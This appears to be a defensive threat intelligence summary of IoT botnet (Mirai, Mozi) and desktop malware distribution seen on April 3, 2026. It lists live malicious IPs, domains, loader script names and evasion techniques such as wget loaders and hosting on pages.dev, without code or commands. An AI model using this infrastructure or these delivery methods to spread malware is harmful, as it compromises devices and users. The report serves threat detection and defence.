On April 3, 2026, threat intelligence monitoring identified 50 malicious URLs actively distributing IoT botnet malware, with significant focus on Mirai and Mozi variants. The threat landscape for this period is dominated by IoT device exploitation campaigns targeting multiple architectures (MIPS, ARM, x86_64) through automated malware distribution infrastructure. Notably, a concentrated distribution campaign from IP 87.121.84.18 delivered multi-architecture Mirai payloads, indicating sophisticated botnet recruitment operations. Additionally, multiple Mozi botnet nodes were observed across predominantly Asian IP ranges, suggesting ongoing peer-to-peer propagation activity. Non-IoT threats included Amadey information stealer distribution and potential phishing campaigns leveraging fake Adobe and WordPress installer packages. The absence of exploited vulnerabilities in KEV or NVD feeds suggests threat actors are primarily relying on credential attacks and default password exploitation rather than zero-day vulnerabilities during this period.
Multiple malware distribution URLs detected hosting Mirai and Mozi botnet variants targeting IoT devices across various architectures
Coordinated malware distribution campaign serving Mirai botnet payloads for MIPS, ARM (5/7), MIPSEL, and x86_64 architectures via wget-based delivery scripts. Infrastructure hosting loader scripts (lol.sh, wget.sh) and architecture-specific ELF binaries indicates active botnet recruitment operations.
29 unique IP addresses observed distributing Mozi botnet malware, predominantly targeting MIPS and ARM architectures. Geographic concentration in Asian IP ranges (China, India) suggests regional IoT device compromise campaign. Mozi's DHT-based P2P architecture enables decentralized malware distribution without centralized C2 infrastructure.
MIPS64 architecture-specific Mirai payload distributed via wget user-agent delivery mechanism, indicating targeted exploitation of 64-bit MIPS IoT devices including routers and network equipment.
Brazilian IP space hosting Mirai botnet distribution infrastructure with loader scripts targeting IoT devices. Geographic diversification of distribution infrastructure indicates global botnet operations.
Non-IoT malware distribution including information stealers and social engineering campaigns targeting desktop users
Amadey malware distributed via compromised legitimate website (racing-shop-schuller.de) disguised as WebRTC driver installation package. Amadey serves as initial access loader for additional malware payloads including ransomware and banking trojans.
Malicious VBS script hosted on Pages.dev infrastructure impersonating Adobe Acrobat Reader patch/update. Likely delivers additional payloads or credentials harvesting tools through Visual Basic script execution.
Two domains (keilo-jermailer.com, mailer-kjermjs.com) distributing ZIP archives labeled 'WORDPRESS 2026', likely containing webshells, PHP backdoors, or credential stealing malware targeting WordPress administrators and developers.
Multiple suspicious files (JNG1.txt, JNG2.txt, Porcate.cmd, imbosomed.deploy) hosted on single infrastructure node. File extensions and naming patterns suggest obfuscated payloads requiring further analysis to determine malware family and capabilities.
Analysis of delivery mechanisms and infrastructure characteristics observed in malware distribution campaigns
Consistent use of wget user-agent strings across IoT malware distribution indicates automated infection chains exploiting command injection or authentication bypass vulnerabilities. Shell scripts (*.sh) serve as first-stage loaders downloading architecture-appropriate payloads, enabling rapid multi-platform infections.
Cloudflare Pages platform (pages.dev) and compromised legitimate websites leveraged for malware distribution to evade URL reputation filtering. This technique increases initial access success rates by exploiting trust in legitimate domains and cloud providers.
Mozi botnet nodes communicating on randomized high ports (34068-56628 range) to evade traditional firewall rules and blend with legitimate high-port traffic. DHT-based peer discovery enables resilient botnet operations resistant to takedown efforts.